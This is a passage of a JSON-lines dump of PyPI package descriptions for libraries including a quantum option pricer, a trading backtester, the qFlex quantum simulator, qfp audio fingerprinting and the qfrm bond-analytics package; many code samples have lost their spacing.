assets0=100k=90t=1r=0.05sigma=0.1########################################################################################option_classical=EuropeanOptionPricingClassical(s0,k,t,r,sigma,\"call\",\"long\")# option price calculated by Black-Scholes-Merton modelbsm_price=option_classical.bsm_price()option_classical.set_CMC_sample_size(1000000)# option price calculated by Classical Monte Carlo methodcmc_price=option_classical.cmc_price()option_classical.show_info()########################################################################################option=EuropeanCallQMC(s0,k,t,r,sigma)option.set_num_qubits(3)option.set_scaling(0.04)# set MLAE configurationoption.method=\"MLAE\"Q_powers=[2,3,5,10]shots=[100000]*len(Q_powers)price_qmc=option.get_price_mlae(Q_powers,shots)print(f\"BSM price:\\t{bsm_price:.5f}\")print(f\"CMC price:\\t{cmc_price:.5f}\")print(f\"QMC price:\\t{price_qmc:.5f}\")The typical output is as follows:Europeanoptionpricingwiththefollowingparameters:\noptiontype:call,long\ncurrentstockprice:s0=100strikeprice:k=90timetomaturity(inyears):t=1risk-freeinterestrate:r=0.05\nvolatility:sigma=0.1===================RunningMLAEalgorithm======================powersofQare:[2,3,5,10]numberofshotsare:[100000,100000,100000,100000]ApplyingQ^2tothestateA|0>^8...\nTimeelapsed:0.2348seconds.\n\nApplyingQ^3tothestateA|0>^8...\nTimeelapsed:0.3460seconds.\n\nApplyingQ^5tothestateA|0>^8...\nTimeelapsed:0.5540seconds.\n\nApplyingQ^10tothestateA|0>^8...\nTimeelapsed:1.0420seconds.=====================MLAEalgorithmfinished.====================BSMprice:14.62884\nCMCprice:14.62937\nQMCprice:14.62056LicenseQFinance uses theApache License 2.0."} +{"package": "qfinuwa", "pacakge-description": "QFIN's Algorithmic Backtester (QFAB)GitHub PageSetupTo install on your system, use pip:pip install qfinuwaAPI ClassTo pull market data ensure you have a text file with the API key and callAPI.fetch_stocks:fromqfinuwaimportAPIpath_to_API='API_key.txt'download_folder='./data'API.fetch_stocks(['AAPL','GOOG','TSLA'],path_to_API,download_folder)Indicator ClassMulti-IndicatorsA multi-indicator takes in a single signal (price of an arbitary stock) and outputs a transformation of that stock.It is calledMultiIndicatorbecause the indicator will have multiple values (one for each stock)# ExampleclassCustomIndicators(Indicators):@Indicators.MultiIndicatordefbollinger_bands(self,stock:pd.DataFrame):BOLLINGER_WIDTH=2WINDOW_SIZE=100mid_price=(stock['high']+stock['low'])/2rolling_mid=mid_price.rolling(WINDOW_SIZE).mean()rolling_std=mid_price.rolling(WINDOW_SIZE).std()return{\"upper_bollinger\":rolling_mid+BOLLINGER_WIDTH*rolling_std,\"lower_bollinger\":rolling_mid-BOLLINGER_WIDTH*rolling_std}Single-IndicatorsSimilar toMultiIndicator,SingleIndicatoris implemented as a function that takes in stock data and returns an indicator or indicators.It is calledSingleIndicatorbecause there is only a single signal.# ExampleclassCustomIndicators(Indicators):@Indicators.SingleIndicatordefetf(self,stock:dict):apple=0.2tsla=0.5goog=0.3return{'etf':apple*stock['AAPL']+tsla*stock['TSLA']+goog*stock['GOOG']}Manually TestingYou can manually test you indicators as follows:stock_a=pd.from_csv('stockA.csv')stock_b=pd.from_csv('stockA.csv')# multi-indicator for stockA (returns dict of dict of pd.Series)output_a=CustomIndicators.bollinger(stockA)# multi-indicator for stockB (returns dict of dict of pd.Series)output_b=CustomIndicators.bollinger(stockA)# single-indicator for stockA + stockB (returns dict of pd.Series)output=CustomIndicators.etf({'stockA':stock_a,'stockB':stock_b})Hyper-parametersEach function you implement can be thought of as a hyperparameter \"group\" that bundles the indicator it returns (the keys to the dictionary the indicator function returns).The backtester can change hyperparameters for you, but to do so you need to give each one a name, in the form ofkwargs.Thekwargsmust include a default value which will be used if you do not specify a value.classCustomIndicators(Indicators):@Indicators.MultiIndicatordefbollinger_bands(self,stock:pd.DataFrame,BOLLINGER_WIDTH=2,WINDOW_SIZE=100):mid_price=(stock['high']+stock['low'])/2rolling_mid=mid_price.rolling(WINDOW_SIZE).mean()rolling_std=mid_price.rolling(WINDOW_SIZE).std()return{\"upper_bollinger\":rolling_mid+BOLLINGER_WIDTH*rolling_std,\"lower_bollinger\":rolling_mid-BOLLINGER_WIDTH*rolling_std}@Indicators.SingleIndicatordefetf(self,stock:dict,apple=0.2,tsla=0.5,goog=0.3):return{'etf':apple*stock['AAPL']+tsla*stock['TSLA']+goog*stock['GOOG']}Strategy ClassTo define your strategy extendqfin.Strategyto inherit its functionalities. Implement your ownon_datafunction.Youron_datafunction will be expected to take 4 positional arguments.self: reference to this objectprices: a dictionary of numpy arrays of historical pricesportfolio: object that manages positionsSimilar toqfin.Indicators, you can define hyperparameters for your model in__init__.# Example StrategyclassBasicBollinger(Strategy):def__init__(self,quantity=5):self.quantity=quantityself.n_failed_orders=0defon_data(self,prices,indicators,portfolio):# If current price is below lower Bollinger Band, enter a long positionforstockinportfolio.stocks:if(prices['close'][stock][-1]indicators['upper_bollinger'][stock][-1]):order_success=portfolio.order(stock,quantity=-self.quantity)ifnotorder_success:self.n_failed_orders+=1defon_finish(self):# Added to results object - access using result.on_finishreturnself.n_failed_ordersAdditionally, you can specify a functionon_finishthat will run on the completion of a run, if you want to save your own data. Whatever this function returns will can be accessed in the results (seeSingleRunResults.on_finish).Backtester ClassTheBacktesterclass asks for a custom strategy, custom indicators and data from the user. Once created, it can run multiple backtests without having to recalculate the indicators - when used in a Notebook environment the backtester object can persist and incrementally updated with new values.Creating a BacktesterSeeqfinuwa.Backtesterdocstrings for specifics.fromqfinuwaimportBacktesterbacktester=Backtester(CustomStrategy,CustomIndicators,data=r'\\data',days=90,delta_limits=1000,fee=0.01)Updating Indicator ParametersUpdate Parametersbacktester.indicators.update_params(dict_of_updates)Get Current Parametersbacktester.indicators.paramsGet Defaultsbacktester.indicators.defaultsUpdating Classbacktester.indicators=NewIndicatorClassUpdating Strategy ParametersUpdate Parametersbacktester.strategy.update_params(dict_of_updates)Get Current Parametersbacktester.strategy.paramsGet Defaultsbacktester.strategy.defaultsUpdating Classbacktester.strategy=NewStrategyClassRunning a BacktesterTime Complexity AnalysisMIT LicenseCopyright (c) 2022 Isaac Bergl, QFIN UWAPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qfitswidget", "pacakge-description": "No description available on PyPI."} +{"package": "qflash-auth-jwt-package", "pacakge-description": "Qflash JWT Packagea small package for implement jwt security in APIGetting StartedDependenciesYou need Python 3.7 or later to useqflash_jwt_package. You can find it atpython.org.FeaturesFile structure for PyPI packagesSetup with package informationsLicense example"} +{"package": "qflash-jwt-package", "pacakge-description": "Qflash JWT Packagea small package for implement jwt security in APIGetting StartedDependenciesYou need Python 3.7 or later to useqflash_jwt_package. You can find it atpython.org.FeaturesFile structure for PyPI packagesSetup with package informationsLicense example"} +{"package": "qflashlight", "pacakge-description": "No description available on PyPI."} +{"package": "qflexcirq", "pacakge-description": "qFlex: A flexible high-performance simulator for verifying and benchmarking quantum circuits implemented on real hardwareDescriptionFlexible Quantum Circuit Simulator (qFlex) implements an efficient tensor\nnetwork, CPU-based simulator of large quantum circuits. qFlex computes exact\nprobability amplitudes, a task that proves essential for the verification of\nquantum hardware, as well as mimics quantum machines by computing amplitudes\nwith low fidelity. qFlex targets quantum circuits in the range of sizes expected\nfor supremacy experiments based on random quantum circuits, in order to verify\nand benchmark such experiments.DocumentationqFlex scientific documentation and results can be found in[1],[2]and[3].\nFor technical documentation on how to\nuse qFlex, seeqflex/docs.[1]B. Villalonga,et al.,\"A flexible\nhigh-performance simulator for verifying and benchmarking quantum circuits\nimplemented on real hardware\", NPJ Quantum Information 5, 86 (2019)[2]B. Villalonga,et al.,\"Establishing\nthe Quantum Supremacy Frontier with a 281 Pflop/s Simulation\",\narXiv:1905.00444 (2019)[3]\"Quantum supremacy\nusing a programmable superconducting processor\",\nNature 574, 505\u2013510 (2019)Build methodsTo ensure cross-platform viability, qFlex supports multiple different build\nmethods. If one of the build methods below does not work on your system, try\nusing one of the other methods listed.Local installationTo build qFlex on your machine, simply run:$ autoreconf -i && autoconf && ./configure\n$ make && make run-testsTo disable qFlex python interface, use./configure --disable-pybind11.If missing, python modules can be installed as follows:$ python3 -m pip install -r scripts/requirements.txtAfter running these commands, qFlex can be installed by runningmake install.\nBy default, this installs qFlex in$HOME/local/. To change the installation\nfolder, use./configure --prefix=/new/installation/folder/.qFlex provides an experimental support forOpenMP. To activateOpenMP, run./configurewith the extra-option--enable-openmp.qFlex relies onOpenBLASfor optimized\nmatrix operations.For more information, seethe installation guide.Build Using DockerDockerallows you to run qFlex in an isolated environment,\nwithout having to worry about managing dependencies.To build qFlex with Docker, seethe Docker guide.An automated qFlex Docker container, synced with themasterbranch, can be\npulled from Docker Hub as:$ docker pull ngnrsaa/qflexBuild Using Rootless ContainersRootless containers are an alternative to Docker targeted at users who may not\nhaverootprivileges on their machine.To run qFlex in a rootless container, seeqflex/docs/rootless-container.md.Using Google CirqCirqis a framework for modeling and\ninvoking Noisy Intermediate Scale Quantum (NISQ) circuits.To run qFlex on Google Cirq circuits, or just to call the simulator from Python,\nseeqflex/docs/cirq_interface.md.LicenseCopyright \u00a9 2019, United States Government as represented by the Administrator\nof the National Aeronautics and Space Administration. All rights reserved.The Flexible Quantum Circuit Simulator (qFlex) framework is licensed under the\nApache License, Version 2.0 (the \"License\"); you may not use this application\nexcept in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0.Unless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License."} +{"package": "qf-lib", "pacakge-description": "QF-LibWhat is QF-lib?QF-Libis a Python library that provides high quality tools for quantitative finance.\nA large part of the project is dedicated to backtesting investment strategies.\nThe Backtester uses anevent-driven architectureand simulates events such as daily market opening\nor closing. It is designed totest and evaluate any custom investment strategy.Main features include:Flexible data sourcing - the project supports the possibility of an easy selection of the data source. Currently provides financial data fromBloomberg,Quandl,Haver AnalyticsorPortara. To check if there are any additional dependencies necessary for any of these data providers please visitthe installation guide.Tools to prevent look-ahead bias in the backtesting environment.Adapteddata containers, which extend the functionality of pandasSeries'andDataframes.Summary generation - all performed studies can be summarized with a practical and informative document explaining the results.Several document templatesare available in the project.Simple adjustment of existing settings and creation of new functionalities.InstallationYou can installqf-libusing the pip command:pipinstallqf-libAlternatively, to install the library from sources, you can download the project and in the qf_lib directory\n(same one where you found this file after cloning the repository) execute the following command:pythonsetup.pyinstallPrerequisitesThe library usesWeasyPrintto export documents to PDF. WeasyPrint requires additional dependencies, check theplatform-specific instructions for Linux, macOS and Windows installation.In order to facilitate the GTK3+ installation process for Windows you can usefollowing installers. Download and run the latestgtk3-runtime-x.x.x-x-x-x-ts-win64.exefile to install the GTK3+.DocumentationInstallation guide:https://qf-lib.readthedocs.io/en/latest/installation.htmlConfiguration guide:https://qf-lib.readthedocs.io/en/latest/configuration.htmlAPI documentation:https://qf-lib.readthedocs.io/"} +{"package": "qflip-CQPANCOAST", "pacakge-description": "Quantum Coin FlipFlipping a coin is for losers; use quantum mechanics instead.InstallIt's on pypihere:pip install qflip-CQPANCOAST.\nTo uninstall,pip uninstall qflip-CQPANCOAST.I use this repository for Python packaging practice, as the function is so simple.The CodeHey,I'mnot a loser. What's going on?A lab at ANU is continually making measurements on the quantum vacuum and then putting binary versions of that up on the internet.Here it is!I originally wrote this code by adapting an html parser fromherefor my students in a Computational Methods in Physics class that I was a course assistant for, Spring 2019.\nThe script came later: flipping a coin was too deterministic for me, so I wrote a python script for the shell that gives me truly random quantum measurements!\nMost of the code is mine now, but I figure I should still credit the guy or gal.How do I use it?Just type in qflip and then the number of things you have to choose between.\nThe program will:take a huge number from the ANU quantum random number generator,split it into a bunch of still big ones),store those numbers in a json file in~/.qflip,and mod it by the number you specify.If you don't spefcify a number, it'll choose 2.$qflip0$qflip1$qflip1$qfilp2713$qflip0# This will throw a ValueError.$qflip-1# So will this...$qflipbeans# ...and this.$qflip1# This is fine, though not useful.0Need to decide what I'll have for dinner?\nIf I have four options, I just assign each of them a number from 0 to 3, and typeqflip 4into the prompt.Need to decide what homework assignment I'll do first?\nIf I have seventeen options... well, you get the point.The PhysicsNo, but really, what's going on here?First of all, there's no way of testing the experimentally, but many (including me) are of the opinion that thinking about this any other way requires mangling the beautiful, beautiful math.Here's what's up: in laymans terms, before we observe Schrodinger's cat, it is in a superposition of states: neither dead nor alive.\nThen, we open the box to make our observation.\nIt looksto uslike cat is now definitely alive or dead, but really,we have splitinto someone who saw the cat live and someone who saw the cat die, just like the cat had split earlier!\nThis isn't the place to go into how quantum mechanics works, but what you need to know is that there's atotally real other universewhere the numbers in the picture above are different.\nIsn't that cool?When I use this program to decide what shirt to wear, I end up wearing all of them \u2013 but it looks to me like I chose one.\nWe are part of the universe, and wealsofollow the strange laws of quantum mechanics.If you want further explanation, first do some reading on quantum mechanics (The Feynman Lecturesare always a great place to start), then check outHugh Everett's Theory of the Universal Wavefunction, more popularly known as the \"Many Worlds\" interpretation of quantum mechanics.Again, no way of testing this experimentally, but it sure makes the most sense to me.\nDebating interpretations of quantum mechanics is exhuasting, so if you're looking for arguments one way or the other, you're free to look online.Dear reader, there are so many people smarter than I am.If you're looking to use the ANU quantum random number server for actual work, don't use this repo \u2014 this is just a silly thing I made, functional though it is.This project, on the other hand, has a wide array of utility.\nCheck it out!Thisis also pretty cool."} +{"package": "qflow", "pacakge-description": "qflow package for personal use"} +{"package": "qflow-vmc", "pacakge-description": "QFLOW - Quantum Variational Monte Carlo with Neural NetworksSee thedocumentation pagesfor details regarding theqflowpackage.For the accompanying master's thesis, seewriting/Thesis.pdf"} +{"package": "qfly", "pacakge-description": "No description available on PyPI."} +{"package": "qfmath", "pacakge-description": "No description available on PyPI."} +{"package": "qfmu", "pacakge-description": "qfmuis a python package to generatecontinuous-time,LTIsystem FMUs from command line.InstallationInstallqfmuthrough PyPIpip install qfmuNotedthat a C compiler is requiredmsvcfor Windowsgccfor Linuxclangfor MacOSFeaturesCurrently, qfmu is able to generate fmus that are compliant withFMI2standard.The following models are supported:ModelMECSState Space (ss)\u2714\ufe0f\u2714\ufe0fTransfer Function (tf)\u2714\ufe0f\u2714\ufe0fZeroPoleGain (zpk)\u2714\ufe0f\u2714\ufe0fPID (pid)\u2714\ufe0f\u2714\ufe0fNotedthat only continuous-time models are supported currently.ExamplesGenerate a continuous-time state space FMUqfmuss-A\"[[1,2],[3,4]]\"-B\"[[1],[2]]\"-C\"[[1,0],[0,1]]\"-x0\"[3.14, 6]\"-o./example_ss.fmuIfqfmuis installed properly, you should see aexample_ss.fmufile generated in your current working directory.If you havefmpyinstalled, you can runfmpy info example_ss.fmuto see detailed model information.Model Info\n\n FMI Version 2.0\n FMI Type Model Exchange, Co-Simulation\n Model Name q\n Description None\n Platforms c-code, linux64\n Continuous States 2\n Event Indicators 0\n Variables 10\n Generation Tool qfmu\n Generation Date 2023-10-08 21:24:32.733857\n\nDefault Experiment\n\n Stop Time 1.0\n Tolerance 0.0001\n\nVariables (input, output)\n\n Name Causality Start Value Unit Description\n u1 input 0.0 Model input 1\n y1 output Model output 1\n y2 output Model output 2Generate a continuous-time transfer function FMU using thenumerator,denominatorrepresentation: $\\frac{s}{s+1}$qfmutf--num\"[1]\"--den\"[1,1]\"-o./example_tf.fmuGenerate a continuous-time transfer function FMU using thezero-pole-gainrepresentation: $\\frac{0.5(s-1)}{(s+1)(s+2)}$qfmuzpk-z\"[1]\"-p\"[-1, -2]\"-k0.5-o./example_zpk.fmuGenerate a continuous-time PI controller FMU: $3 + \\frac{0.1}{s}$qfmupid--kp=3.0--ki=0.1-o./example_pid.fmu"} +{"package": "qfnn", "pacakge-description": "qfnnThe \"qfnn\" (or QuantumFlow Neural Network Library)\nis a library to support the implementation\nofQuantumFlowand its extensions, includingQF-MixerandQF-RobustNN."} +{"package": "qforce", "pacakge-description": "Quantum Mechanically augmented molecularforcefieldsPlease see theDocumentation.If you use Q-Force, please cite:Sami, S.; Menger, M. F. S. J.; Faraji, S.; Broer, R.; Havenith, R. W. A., Q-Force: Quantum Mechanically Augmented Molecular Force Fields. Journal of Chemical Theory and Computation 2021, 17 (8), 4946-4960."} +{"package": "qformat", "pacakge-description": "qformat"} +{"package": "qformatpy", "pacakge-description": "IntroductionWelcome to the qformat Python library, a powerful tool for formatting floating-point\nnumbers into fixed-point representation with Q notation.This library supports ARM\u2019s Q format, where QI includes the sign bit.The main function, qformat, allows users to specify the number of integer bits (QI),\nfractional bits (QF), whether the number is signed or unsigned, and provides flexibility\nin choosing rounding and overflow handling methods.Whether you\u2019re working on embedded systems, signal processing, or any application requiring fixed-point\nrepresentation, qformat is here to streamline the process.The example below shows pi being converter to the sQ4.8 format, using Truncation as the\nrounding method:>>>fromqformatpyimportqformat>>>x=3.141592653589793>>>result=qformat(x,qi=4,qf=8,rnd_method='Trunc')>>>resultarray([3.140625])InstallationThe qformatpy library is available via PIP install:python3-mvenvpyenvsourcepyenv/bin/activatepipinstallqformatpyImport the package as shown below:importqformatpyExample usage>>>importnumpyasnp>>>importqformatpy>>>test_array=np.array([1.4,5.57,3.14])>>>qformatpy.rounding(test_array,'TowardsZero')array([1,5,3])>>>qformatpy.rounding(test_array,'HalfDown')array([1,6,3])LinksDocumentation:https://qformatpy.readthedocs.io/en/latest/"} +{"package": "qformer", "pacakge-description": "QformerImplementation of Qformer from BLIP2 in Zeta Lego blocks. The implementation is here straight from Figure 2. In particular the image block and text block.Installpip3 install qformerUsageimporttorchfromqformerimportQFormerx=torch.randn(1,32,512)# Create a random tensor of shape (1, 32, 512)img=torch.randn(1,32,512)# Create another random tensor of shape (1, 32, 512)qformer=QFormer(512,8,8,0.1,2,2)# Create an instance of the QFormer modely=qformer(x,img)# Apply the QFormer model to the input tensors x and imgprint(y.shape)# Print the shape of the output tensor yLicenseMITCitation@misc{li2023blip2,\n title={BLIP-2: Bootstrapping Language-Image Pre-training with Frozen Image Encoders and Large Language Models}, \n author={Junnan Li and Dongxu Li and Silvio Savarese and Steven Hoi},\n year={2023},\n eprint={2301.12597},\n archivePrefix={arXiv},\n primaryClass={cs.CV}\n}"} +{"package": "qfp", "pacakge-description": "QfpQfp is a python library for creating audio fingerprints that are robust to alterations in pitch and speed. This method is ideal for ID'ing music from recordings such as DJ sets where the tracks are commonly played at a different pitch or speed than the original recording. Qfp is an implementation of the audio fingerprinting/recognition algorithms detailed in a 2016 academic paper by Reinhard Sonnleitner and Gerhard Widmer[1].NOTE: This is a fork ofhttps://github.com/mbortnyck/qfp/which incorporates:multiple bug fixesPython 3 compatibiltymodern packaging with PoetryThis is all in service of having a convient audio fingerprinting service\nfor a website I'm working on.QuickstartInstall by downloading it from PyPI.pipinstallqfpYou can create a fingerprint from your reference audio...fromqfpimportReferenceFingerprintfp_r=ReferenceFingerprint(\"Prince_-_Kiss.mp3\")fp_r.create()...or a query fingerprint from an audio clip that you wish to identify.fromqfpimportQueryFingerprintfp_q=QueryFingerprint(\"unknown_audio.wav\")fp_q.create()The QfpDB can store reference fingerprints...fromqfp.dbimportQfpDBdb=QfpDB()db.store(fp_r,\"Prince - Kiss\")... and look up query fingerprints.fp_q=QueryFingerprint(\"kiss_pitched_up.mp3\")fp_q.create()db.query(fp_q)print(fp_q.matches)[Match(record=u'Prince - Kiss',offset=0,vScore=0.7077922077922078)]Qfp currently accepts recordings inany format that FFmpeg can handle.DependenciesFFmpeg -https://github.com/FFmpeg/FFmpegNumPy -https://github.com/numpy/numpyPydub -https://github.com/jiaaro/pydubSciPy -https://github.com/scipy/scipySQLite -https://www.sqlite.org/[1]\tR. Sonnleitner and G. Widmer, \"Robust quad-based audio fingerprinting,\" IEEE/ACM Transactions on Audio, Speech and Language Processing (TASLP), vol. 24, no. 3, pp. 409\u2013421, Jan. 2016. [Online]. Available:http://ieeexplore.ieee.org/abstract/document/7358094/. Accessed: Nov. 15, 2016."} +{"package": "qf-package", "pacakge-description": "No description available on PyPI."} +{"package": "qfracture", "pacakge-description": "Overviewqfracture is a Qt based front end exposing a fracture project. The interface\nallows for data browsing and searching as well as data interaction.For full details on fracture please see:https://github.com/mikemalinowski/fractureBrowsingqFracture displays a browsing panel which allows you to navigate data in a\nnatural way - which is particularly useful if your data is file based.Right clicking aData Assetexposes the functionality bound to that data.SearchingWithin qFracture you can perform searches against your dataset. Fracture is\nvery quick at resolving searches - so this can be a preferable mechanism\nwhen interacting with data if you have a reasonable idea of what you're looking\nfor.When no search entries are present this view will show anyData Elementswhich\nyou have marked as being favourites - allowing them to be accessed very quickly\nwith no overhead.Setting up a ProjectThe qFracture UI offers a wizard to make it easy to setup a new fracture\nproject. This guides you through the process of defining the data structure\nlocation, the plugin locations and where you want to save your project file.It will also initiate a short scan of your data location. Depending on how\nbig your data set this can take a little time.Upon completion your data set is entirely searchable.System TrayThe qFracture Ui only performs a deep scan during the first time setup. Beyond\nthat, each location is re-scanned as you traverse those locations through the\nbrowser panel.If you want time based scans to occur you can trigger theSystem Trayapplication (which is launchable from theSettingstab). The system tray\nallows you to specify an interval time (in seconds), and enable or disable\ntimed scans.This approach allows the scanning to occur in a completely different process\nto any qFracture instances which can aid performance, especially if you're\nrunning qFracture from within environments such as Maya or Max etc.CollaborationI am always open to collaboration, so if you spot bugs lets me know, or if\nyou would like to contribute or get involved just shout!CompatibilityLaunchpad has been tested under Python 2.7 and Python 3.7 on Windows and Ubuntu."} +{"package": "qfragment", "pacakge-description": "No description available on PyPI."} +{"package": "qfrm", "pacakge-description": "Quantitative Financial Risk Management (QFRM) project is a (rapidly growing) set of analytical tools\nto measure, manage and visualize identified risks of derivatives and portfolios in finance.Why use Quantitative Financial Risk Management (QFRM) package:We applyobject-oriented programming (OOP) paradigmto abstract the complexities of financial valuation.Plentiful examples: each class has a numerous examples, including sensitivity plots and multidimensional visualization.Resources: we included references (J.C.Hull\u2019sOFODtextbook, academic research and online resources) we used to build and validate our analytical tools.Simplicity, consistency and usability: QFRM uses basic data structures as user inputs inputs/outputs (I/O).Longevity: qfrm dependencies are limited toPython Standard Library, pandas, numpy, scipy, and matplotlib.We try to sensibly vectorize our functions to help you with application of QFRM functionality.All programing is done with usability/scalability/extendability/performance in mind.This project grows rapidly with an effort from a dozen of bright quant finance developers. Check back for updates throughout Fall 2015.Our Team:This is a group of ambitious and diligent Rice University science students from doctoral, masters and undergraduate programs. United in their work, we expand and contribute to finance community and QFRM course, led by Oleg Melnikov, a statistics doctoral student and instructor of QFRM course at Rice University, Department of Statistics.Oleg Melnikov(author, creator), Department of Statistics, Rice University,http://Oleg.Rice.edu,xisreal@gmail.comThaw Da Aung (contributor), Department of Physics,Thawda.Aung@rice.eduYen-Fei Chen (contributor), Department of Statistics,Yen-Fei.Chen@rice.eduPatrick J. Granahan (contributor), Department of Computer Science,pjgranahan@rice.eduHanting Li (contributor), Department of Statistics,HANTING.LI@rice.eduSha (Andy) Liao (contributor), Department of Physics,Andy.Liao@rice.eduScott Morgan (contributor), Department of Computer Science,spmorgan@rice.eduAndrew M. Weatherly (contributor), Department of Computational and Applied Mathematics,amw13@rice.eduMengyan Xie (contributor), Department of Electrical Engineering,Mengyan.Xie@rice.eduTianyi Yao (contributor), Department of Electrical Engineering,Tianyi.Yao@rice.eduRunmin Zhang (contributor), Department of Physics,Runmin.Zhang@rice.eduOOP Design and functionality:In progress:Bond pricing is temporarily disabled (will return soon), but you\u2019ll find numerous exotic option pricing (via Black-Scholes model, lattice tree, Monte Carlo simulation and finite differencing) in the package.classPVCF(present value of cash flows) accepts time-indexed cash flows and a yield curve to compute:net present value (NPV), internal rate or return (IRR), time value of money (TVM)Linearly interpolated yield curve with time-to-maturities (TTM) matching those of cash flows (CF)Visualization: CF diagramclassBond(inheritsPVCF) accepts coupon/frequency/TTM specification along with optional yield curve (with optional TTM) to compute:Valuation and performance analytics: clean/dirty price, yield to maturity (ytm), par and current yieldinterest rates (IR) are assumed to be continuously compounded (CC), but user has a method to convert from/to any frequency.Risk analytics: Macaulay/Modified/Effective durations, convexityVisualization: CF diagram, dirty/clean price convergence, price sensitivity curves and slopes with and without convexity adjustment.classUtilprovides some helpful functionality for verifying/standardizing in I/O of other class\u2019 methods.Planned implementation:Fixed income portfolio analytics, exotic option pricing (via lattice, Black-Scholes model (BSM),\nMonte Carlo simulations, and Finite Differencing Methods (FDM)), and further visualization of concepts in finance.Genesis:This project started as aQFRM R packagein Spring 2015 QFRM course (STAT 449 and STAT 649) at Rice University.The course is part of computational finance and economic systems (CoFES) program,\nled byDr. Katherine Ensor.Underlying textbook (source of financial calculations and algorithms)Options, Futures and other Derivatives (OFOD)by John C. Hull, 9ed, 2014,ISBN 0133456315is a well established text in finance and risk management. Major certification exams in finance (CFA, FRM, CAIA, CQF, \u2026) list it as a core reference.Install:Directly from PyPI with pip command in a terminal (or windows command, cmd.exe) prompt, assumingpipis in your PATH:$pipinstallqfrmTypical usage:3% annually-paying bond with 3.1 TTM (in years), evaluated at 5% continuously compounded (CC) yield-to-maturity (YTM),\ni.e. flat yield curve (YC)>>>Bond(3,1,3.1,pyz=.05).analytics()------------------Bondanalytics:------------------------*Annualcoupon,$:3*Couponfrequency,p.a.:1Timetomaturity(ttm),yrs:3.1*Cashflows,$p.a.:(3.0,3.0,3.0,103.0)Timetocashflows(ttcf),yrs:(0.10000000000000009,1.1,2.1,3.1)Dirtyprice(PVCF),$:96.73623*Cleanprice(PVCF-AI),$:94.03623YTM,CCrate:0.05YTM,rateatcouponfrequency:0.05127Currentyield,rateatcouponfrequency:0.0319*Paryield,rateatcouponfrequency:0.03883Yieldcurve,CCrate:(0.05,0.05,0.05,0.05)Macaulayduration,yrs:2.9208Modifiedduration,yrs:2.77835Effectiveduration,yrs:2.92126*Convexity,yrs^2:8.92202Desc:{}------------------------------------------------------------------------------Medianruntime(microsec)for1iteration(s):11604.918843659107Textbook example (default) of 6% SA bond with 2 years/time to maturity (TTM), see p.83 in Hull\u2019s OFOD/9ed>>>Bond().analytics()4% semi-annual (SA) bond with 4.25 ttm (4 years and 3 mo), evaluated at $97.5 PVCF (which computes to 4.86% ytm or flat YC)>>>b=Bond(4,2,4.25,pyz=97.5)>>>b.ytm()# compute yield from supplied (PVCF) price ($97.5 assumed)0.048615328294339864>>>b.ytm(px_target=(97.5,98,99,100,101))# vectorized computation of yield-to-maturity(0.048615328294339864,0.047305618596811434,0.04470725938701976,0.04213648737177501,0.039592727021145635)>>>b.analytics()# prints full report and visualizationThe same 4% SA bond evaluated with a specific YC.\nZero rates are assumed to have TTM matching those of cash flows (CF), left to right.\nInsufficient rates are extrapolated with a constant.>>>b.set_pyz(pyz=(.05,.06,.07,.08)).analytics()The same 4% SA bond evaluated with a specific YC. User provides zero rates with corresponding TTM.\nTTM required to evaluate CF are extra/interpolated from existing curve with constant rates on each side.>>>b.set_pyz(pyz=(.05,.06,.04,.03),ttz=(.5,1,2,6)).analytics()This project uses industry-accepted acronyms:AI: accrued interestAPT: arbitrage pricing theoremASP: active server pages (i.e. HTML scripting on server side) by Microsoftb/w: betweenbip: basis pointsBM: Brownian motion (aka Wiener Process)Bmk: benchmarkBOPM: binomial option pricing modelbp: basis pointsBSM: Black-Scholes model or Black-Scholes-Merton modelBT: binomial treec.c.: continuous compoundingCC: continuous compoundingCCP: central counterpartyCCRR: continuously compounded rate of returnCDS: credit default swapCDO: credit default obligationCF: cash flowsCmdt: commodityCorp: corporate (finance or sector)CP: counterparty (in finance)CUSIP: Committee on Uniform Security Identification Procedures, North-American financial security identifier (like ISIN)ESO: employee stock optionETD: exchange-traded derivativeFE: financial engineeringFDM: Finite differencing methodFRA: forward rate agreementFRN: floating rate notesFwd: forwardFX: foreign currency or foreign currency exchangeFV: future valueGBM: geometric Brownian motionGvt: governmentHld: holdingIdx: indexIM: initial marginIR: interest rateIRD: interest rate derivativesIRTS: interest rate term structureISIN: International Securities Identification NumberLIBID: London Interbank bid rateLIBOR: London Interbank Offered RateLT: lattice tree (i.e binomial, trinomial, \u2026)MA: margin account; moving averageMC: margin callMC: Monte Carlo simulationMgt: managementMkt: marketMM: maintenance marginMP: Markov processMTM: marking to marketMtge: mortgageMV: multivariateOFOD: Options, Futures, and Other DerivativesOFOD9e: Options, Futures, and Other Derivatives, 9th editionOIS: overnight index SWAP rateOOP: object oriented programmingp.a.: per annumPD: probability of defaultPDE: partial differential equationPM: portfolio managerPORTIA: portfolio accounting system by Thomson FinancialPts: pointsPV: present valuePVCF: present value of cash flowsQFRM: quantitative financial risk managementREPO: Repurchase agreement rateRFR: risk free rateRN: risk-neutralRNW: risk-neutral worldRoI: return on investmentRoR: rate of returnr.v.: random variables.a.: semi-annualSA: semi-annualSAC: semi-annual compoundingSP: stochastic processSQL: sequel query languageSQP: standard Wiener processSURF: step up recovery floaters (floating rate notes)TBA: to be announcedTBD: To be determinedTOMS: Trade Order Management Solution (or System)Trx: transactionTS: time seriesTSA: time series 